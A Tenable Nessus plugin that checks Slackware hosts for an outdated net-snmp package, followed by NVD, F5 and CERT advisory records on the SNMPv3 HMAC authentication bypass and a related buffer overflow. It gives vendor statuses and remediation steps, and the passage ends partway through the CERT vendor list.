Slackware 12.0 / 12.1 / current : net-snmp (SSA:2008-210-07)
2008-07-29T00:00:00
ID SLACKWARE_SSA_2008-210-07.NASL Type nessus Reporter This script is Copyright (C) 2008-2021 Tenable Network Security, Inc. Modified 2008-07-29T00:00:00
Description
New net-snmp packages are available for Slackware 12.0, 12.1, and
-current to fix security issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Slackware Security Advisory 2008-210-07. The text
# itself is copyright (C) Slackware Linux, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(33752);
script_version("1.21");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");
script_cve_id("CVE-2008-0960", "CVE-2008-2292");
script_xref(name:"SSA", value:"2008-210-07");
script_name(english:"Slackware 12.0 / 12.1 / current : net-snmp (SSA:2008-210-07)");
script_summary(english:"Checks for updated package in /var/log/packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Slackware host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"New net-snmp packages are available for Slackware 12.0, 12.1, and
-current to fix security issues."
);
# http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.388995
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?7ff3cebd"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected net-snmp package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
script_cwe_id(119, 287);
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:slackware:slackware_linux:net-snmp");
script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux");
script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:12.0");
script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:12.1");
script_set_attribute(attribute:"patch_publication_date", value:"2008/07/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2008/07/29");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.");
script_family(english:"Slackware Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Slackware/release", "Host/Slackware/packages");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("slackware.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Slackware/release")) audit(AUDIT_OS_NOT, "Slackware");
if (!get_kb_item("Host/Slackware/packages")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Slackware", cpu);
flag = 0;
if (slackware_check(osver:"12.0", pkgname:"net-snmp", pkgver:"5.4.1.2", pkgarch:"i486", pkgnum:"1_slack12.0")) flag++;
if (slackware_check(osver:"12.1", pkgname:"net-snmp", pkgver:"5.4.1.2", pkgarch:"i486", pkgnum:"1_slack12.1")) flag++;
if (slackware_check(osver:"current", pkgname:"net-snmp", pkgver:"5.4.1.2", pkgarch:"i486", pkgnum:"1")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());
else security_hole(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"cve": [{"lastseen": "2021-02-02T05:35:12", "description": "SNMPv3 HMAC verification in (1) Net-SNMP 5.2.x before 5.2.4.1, 5.3.x before 5.3.2.1, and 5.4.x before 5.4.1.1; (2) UCD-SNMP; (3) eCos; (4) Juniper Session and Resource Control (SRC) C-series 1.0.0 through 2.0.0; (5) NetApp (aka Network Appliance) Data ONTAP 7.3RC1 and 7.3RC2; (6) SNMP Research before 16.2; (7) multiple Cisco IOS, CatOS, ACE, and Nexus products; (8) Ingate Firewall 3.1.0 and later and SIParator 3.1.0 and later; (9) HP OpenView SNMP Emanate Master Agent 15.x; and possibly other products relies on the client to specify the HMAC length, which makes it easier for remote attackers to bypass SNMP authentication via a length value of 1, which only checks the first byte.", "edition": 4, "cvss3": {}, "published": "2008-06-10T18:32:00", "title": "CVE-2008-0960", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0960"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:juniper:session_and_resource_control:2.0", "cpe:/a:juniper:src_pe:1.0", "cpe:/a:juniper:session_and_resource_control:1.0", "cpe:/a:juniper:src_pe:2.0"], "id": "CVE-2008-0960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0960", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:juniper:session_and_resource_control:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:juniper:session_and_resource_control:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:juniper:src_pe:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:juniper:src_pe:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:13", "description": "Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1, as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP).", "edition": 4, "cvss3": {}, "published": "2008-05-18T14:20:00", "title": "CVE-2008-2292", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2292"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:net-snmp:net-snmp:5.2.4", "cpe:/a:net-snmp:net-snmp:5.4.1", "cpe:/a:net-snmp:net-snmp:5.1.4"], "id": "CVE-2008-2292", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:net-snmp:net-snmp:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:net-snmp:net-snmp:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:net-snmp:net-snmp:5.2.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-09-26T00:35:51", "bulletinFamily": "software", "cvelist": ["CVE-2008-0960"], "description": "", "edition": 1, "modified": "2018-03-16T20:28:00", "published": "2008-07-16T04:00:00", "id": "F5:K8939", "href": "https://support.f5.com/csp/article/K8939", "title": "SNMPv3 HMAC verification vulnerability CVE-2008-0960 - VU#878044", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-12-03T05:28:01", "bulletinFamily": "software", "cvelist": ["CVE-2008-0960"], "edition": 1, "description": "Information about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960>\n\n<http://www.kb.cert.org/vuls/id/878044>\n\nF5 Product Development\u00c2 tracked this issue as CR99838 for\u00c2 BIG-IP LTM, GTM, ASM, PSM, Link Controller, and WebAccelerator and it was fixed in BIG-IP 9.4.6 and 10.0.0. For information about upgrading, refer to the BIG-IP [LTM](<https://support.f5.com/content/kb/en-us/products/big-ip_ltm.html>), [GTM](<https://support.f5.com/content/kb/en-us/products/big-ip_gtm.html>), [ASM](<https://support.f5.com/content/kb/en-us/products/big-ip_asm.html>), [PSM](<https://support.f5.com/content/kb/en-us/products/big-ip_psm.html>), [Link Controller](<https://support.f5.com/content/kb/en-us/products/lc_9_x.html>), or [WebAccelerator](<https://support.f5.com/content/kb/en-us/products/wa.html>) release notes.\n\nThis issue was also tracked as CR99838 for Enterprise Manager, and it was fixed in Enterprise Manager 1.7.0.\u00c2 For information about upgrading, refer to the [Enterprise Manager](<https://support.f5.com/content/kb/en-us/products/em.html>) release notes.\n\nF5 Product Development tracked this issue as CR100973 for FirePass and it was fixed in FirePass 6.0.3. For information about upgrading, refer to the [FirePass](<https://support.f5.com/kb/en-us/products/firepass.html>) release notes.\n\nThis issue still exists in the FirePass 5.x branch.\n\nAdditionally, this\u00c2 issue was fixed in Hotfix-BIG-IP-9.3.1-HF3 issued for BIG-IP 9.3.1, Hotfix-BIG-IP-9.4.5-HF2 issued for BIG-IP 9.4.5, Hotfix-BIG-IP-9.6.1-HF2 issued for BIG-IP 9.6.1, and FirePass HF-100973 issued for FirePass 6.0.2. You may download these hotfixes or later versions of the hotfixes from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nTo view a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nObtaining and installing patches\n\nYou can download patches from the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for the following products and versions:\n\nProduct| Version| Hotfix| Installation File \n---|---|---|--- \nFirePass| 5.5.0| hotfix-100973| HF-100973-1-5.5-ALL-0.tar.gz.enc \nFirePass| 5.5.1| hotfix-100973| HF-100973-1-5.51-ALL-0.tar.gz.enc \nFirePass| 5.5.2| hotfix-100973| HF-100973-1-5.52-ALL-0.tar.gz.enc \nFirePass| 6.0.1| hotfix-100973| HF-100973-1-6.01-ALL-0.tar.gz.enc \nFirePass| 6.0.2| hotfix-100973| HF-100973-1-6.02-ALL-0.tar.gz.enc \nBIG-IP SAM| 8.0.0| Secure Access Manager 8.0.0 HF1| Hotfix-BIGIP_SAM-8.0.0-1561.0-HF1.im \n \nWorkaround\n\nYou can work around this issue for FirePass by disabling the SNMP agent. To disable the SNMP agent, perform the following procedure:\n\n 1. Log on to the FirePass Administrative Console.\n 2. Navigate to **Device Management** > **Configuration**.\n 3. Click **SNMP**.\n 4. If you are running FirePass 6.x, clear the **Start SNMP agent** check box. \n \nIf you are running FirePass 5.x, clear the **Run SNMP agent on port **check box.\n 5. Click **Submit**.\n", "modified": "2016-07-25T00:00:00", "published": "2008-07-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/900/sol8939.html", "id": "SOL8939", "type": "f5", "title": "SOL8939 - SNMPv3 HMAC verification vulnerability CVE-2008-0960 - VU#878044", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:23", "bulletinFamily": "info", "cvelist": ["CVE-2008-0960", "CVE-2008-2292"], "description": "### Overview \n\nA vulnerability in the way implementations of SNMPv3 handle specially crafted packets may allow authentication bypass. \n\n### Description \n\nSNMP can be configured to utilize version 3, which is the current standard version of SNMP. SNMPv3 incorporates security features such as authentication and privacy control among other features. Authentication for SNMPv3 is done using keyed-Hash Message Authentication Code (HMAC), a message authentication code calculated using a cryptographic hash function in combination with a secret key. Implementations of SNMPv3 may allow a shortened HMAC code in the authenticator field to authenticate to an agent or a trap daemon using a minimum HMAC of 1 byte.\n\nThis issue is known to affect Net-SNMP and UCD-SNMP. Other SNMP implementations may also be affected. \n \n--- \n \n### Impact \n\nThis vulnerability allows attackers to read and modify any SNMP object that can be accessed by the impersonated user. Attackers exploiting this vulnerability can view and modify the configuration of these devices. \n \n--- \n \n### Solution \n\n \n**Upgrade** \n \nThis vulnerability is addressed in Net-SNMP versions 5.4.1.1, 5.3.2.1, 5.2.4.1, 5.1.4.1, 5.0.11.1 and UCD-SNMP 4.2.7.1. Please see the [Net-SNMP download page](<http://www.net-snmp.org/download.html>). \n \nAlternatively, consult your vendor. See the Systems Affected section below for more information. \n \n**Apply a patch** \n \nNet-SNMP has released a patch to address this issue. For more information refer to [SECURITY RELEASE: Multple Net-SNMP Versions Released](<http://sourceforge.net/forum/forum.php?forum_id=833770>). Users are encouraged to apply the patch as soon as possible. Note that patch should apply cleanly to UCD-snmp too. \n \n--- \n \n \n**Enable the SNMPv3 privacy subsystem** \n \nThe configuration should be modified to enable the SNMPv3 privacy subsystem to encrypt the SNMPv3 traffic using a secret, private key. This option does not encrypt the HMAC, but does minimize the possible affects from this vulnerability. \n \n--- \n \n### Vendor Information\n\n878044\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Extreme Networks __ Affected\n\nNotified: May 20, 2008 Updated: April 22, 2009 \n\n**Statement Date: April 20, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nExtreme Networks products running \"Extremeware\" software are not vulnerable.\n\nExtreme Networks products running \"EXOS\" software are vulnerable. \nThis vulnerability is fixed in EXOS patch release 11.6.4.11-patch1-7 and will be integrated into the subsequent sustaining releases.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Global Technology Associates __ Affected\n\nNotified: May 20, 2008 Updated: July 16, 2009 \n\n**Statement Date: July 16, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Global Technology Associates products running GB-OS 5.1.4 and later are not vulnerable. GTA products running earlier versions of GB-OS are vulnerable if the SNMP service is utilized and enable.`\n\n`Customers running systems with GB-OS prior to version 5.1.4 are encouraged to update their GTA product to GB-OS 5.1.4 or 5.2.x. In the event that it is not possible to update your GTA product, customers should disable the SNMP service on their system to prevent the exploit of this vulnerability.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Initiative Japan Affected\n\nUpdated: June 19, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Juniper Networks, Inc. __ Affected\n\nNotified: May 20, 2008 Updated: June 09, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nJuniper Networks has confirmed that its Session and Resource Control appliances are susceptible to this vulnerability. Customers run SRC versions 1.0.0, 1.0.1, or 2.0.0 on their C-series appliances are encouraged to contact the Juniper Networks Customer Support Center for more detailed information and for product updates.\n\nAll other Juniper Networks products are NOT susceptible to this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Network Appliance, Inc. __ Affected\n\nNotified: May 20, 2008 Updated: June 04, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe only NetApp product susceptible to this issue is our early access version of the next major product release. Data ONTAP releases 7.3RC1 and 7.\n\n3RC2 are affected. \n \nThe code does not exist in any 6.5, 7.0, 7.1 or 7.2 or 10.0 release.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. __ Affected\n\nNotified: May 20, 2008 Updated: June 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis issue affects the ucd-snmp package as shipped with Red Hat Enterprise Linux 2.1, and the net-snmp package as shipped with Red Hat Enterprise Linux 3, 4, and 5. Updated packages to correct this issue are available along with our advisories at the URL below and via the Red Hat Network:\n\n<http://rhn.redhat.com/cve/CVE-2008-2292.html>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SNMP Research __ Affected\n\nUpdated: June 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVulnerabilities have been found in the authentication code in multiple implementations of SNMPv3 including NetSNMP, SNMP Research, and many products derived from these reference\n\nimplementations. \n \nThe vulnerabilities in the implementations are slightly different but both allow a sender to create certain malformed packets which will be accepted as authentic by the receiver even though they are not authentic and thereby allow an interloper to masquerade as another principal. \n \nThe vulnerability applies equally to use of either MD5 or SHA-1. \n \nThis vulnerability is present in multiple products including those of SNMP Research. \n \nThis vulnerability is present in all SNMP Research products which support SNMPv3 up through and including Release 16.1, i.e., the vulnerability was present in SNMP Research product \nReleases 15.1, 15.2, 15.3, 15.4, and 16.1, as well as products derived from those code bases unless upgraded, (please see the next paragraph). \n \nSNMP Research product Release 16.2 and subsequent releases are believed to not be subject to this vulnerability. SNMP Research product Release 16.2 became generally available in late 2006 and all SNMP Research customers with support agreements should have received product distributions that are not subject to this vulnerability in December 2006 or January 2007. SNMP Research products shipped after that time are not believed to be subject to this vulnerability. \n \nIn SNMPv3, the authentication subsystem is responsible for protecting against multiple threats: \n \nModification of Information, \nMasquerade, and \nMessage Stream Modification \n \nThis vulnerability potentially compromises the protections against each of the above threats. \n \nThe vulnerability is in the implementations. There are no known problems with the protocol design or specifications in this regard. \n \n \nRemediation \n \nIt is suggested that users upgrade to current versions of the software which do not have these implementation problems and the resulting vulnerabilities. \n \n \nShort-Term Mitigation \n \nA short-term workaround for users who are unable to upgrade in a timely fashion is to modify their configuration data to enable the SNMPv3 privacy subsystem (if it is not already in use), i.e., to encrypt the SNMPv3 traffic using a secret, private key. \n \nBy so doing, it is believed that it will not be computationally feasible for interlopers to \"forge\" valid packets without knowledge of the secret encryption key, i.e., such packets will be dropped at the receiver, thereby somewhat mitigating the problem by thwarting exploitation of the vulnerability. \n \nHowever, while this workaround provides for data origin authentication of the payload of the message, and thereby defends against the masquerade threat (provided that secret encryption key remains known only to legitimate senders and receivers), it does not protect against the two other threats identified above. In particular, the message headers are not protected against the modification of information threat. The message timeliness indicators, which are in the message headers, are potentially subject to manipulation by an interloper, thereby enabling replay attacks (message stream modification threat). An interloper can sucessfully replay valid packets that have been captured since the encryption key(s) in use were most recently changed. \n \nTherefore, enabling encryption should be viewed as a short-term mitigation strategy that is better than doing nothing but not as good as the recommended remdiation strategy. \n \n \nCredits \n \nThese vulnerabilities were first identified by Dr. Tom Dunigan of \nthe University of Tennessee. \n \n \nFor More Information \n \nSpecifications: \nPlease see RFCs 3410 and 3414. \n \nTechnical Support: \nsupport@snmp.com \n+1 865 579 3311 \n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sun Microsystems, Inc. __ Affected\n\nNotified: May 20, 2008 Updated: June 16, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSun has issued the following Security Sun Alert describing the affected products, any workarounds or resolution available:\n\nSun Alert 238865 SNMPv3 Authentication Bypass Vulnerability in snmpd(1M) <http://sunsolve.sun.com/search/document.do?assetkey=1-66-238865-1> \n \nThe above Sun Alert would be updated as and when fully tested patches for the issue are available.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eCosCentric __ Affected\n\nUpdated: June 13, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nFixed in [CVS](<http://ecos.sourceware.org/cgi-bin/cvsweb.cgi/ecos-opt/snmp/lib/current/ChangeLog?rev=1.15&content-type=text/x-cvsweb-markup&cvsroot=ecos>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23878044 Feedback>).\n\n### netsnmp __ Affected\n\nNotified: May 16, 2008 Updated: June 10, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://sourceforge.net/forum/forum.php?forum_id=833770>**.**\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23878044 Feedback>).\n\n### AdventNet Inc. __ Not Affected\n\nNotified: June 13, 2008 Updated: June 18, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.adventnet.com/products/cert_snmp_authentication_vulnerability_notes.html> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23878044 Feedback>).\n\n### Computer Associates Not Affected\n\nNotified: May 20, 2008 Updated: June 20, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Computer Associates eTrust Security Management Not Affected\n\nNotified: May 20, 2008 Updated: June 20, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Force10 Networks, Inc. __ Not Affected\n\nNotified: May 20, 2008 Updated: June 12, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Force10 Networks' FTOS is unaffected by this vulnerability.`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fortinet, Inc. Not Affected\n\nNotified: May 20, 2008 Updated: May 27, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Foundry Networks, Inc. Not Affected\n\nNotified: May 20, 2008 Updated: June 17, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Funkwerk Enterprise Communications __ Not Affected\n\nUpdated: June 18, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nUS-CERT has recently published a Security Alert concerning a \u201cSNMPv3 Authentication Bypass Vulnerability\u201d (see <http://www.us-cert.gov/cas/techalerts/TA08-162A.html> for details).\n\nWe would like our customers to know that all Funkwerk Enterprise Communications products running a version of the BOSS operating system are NOT affected by this vulnerability. \n \nThe respective products are: \no devices of the R2xx Series (e.g. R232bw), Rxx00 Series (e.g. R3000w), X Series (e.g. X2302) and VPN Series of gateways \no devices of the Wx002, WIx040 and WIx065 Series of WLAN products running the BOSS operating system. \n \nAlso note that SNMP V 3 which is affected by the vulnerability was not introduced before System Software 7.4.1.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Not Affected\n\nNotified: May 20, 2008 Updated: June 18, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel Corporation Not Affected\n\nNotified: May 20, 2008 Updated: May 21, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Not Affected\n\nNotified: May 20, 2008 Updated: June 04, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microsoft Corporation Not Affected\n\nNotified: May 20, 2008 Updated: May 28, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Novell, Inc. Not Affected\n\nNotified: May 20, 2008 Updated: June 04, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Stonesoft __ Not Affected\n\nNotified: May 20, 2008 Updated: June 23, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nStonesoft products are not affected by this vulnerability.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TippingPoint, Technologies, Inc. Not Affected\n\nNotified: May 20, 2008 Updated: May 21, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 3com, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: June 02, 2008 Updated: June 02, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alcatel Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Apple Computer, Inc. Unknown\n\nNotified: June 02, 2008 Updated: June 02, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Aruba Networks, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Asante Technologies, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Atheros Communications, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Avici Systems, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BEA Systems, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Bro Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Broadcom Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cisco Systems, Inc. __ Unknown\n\nNotified: May 20, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nRefer to 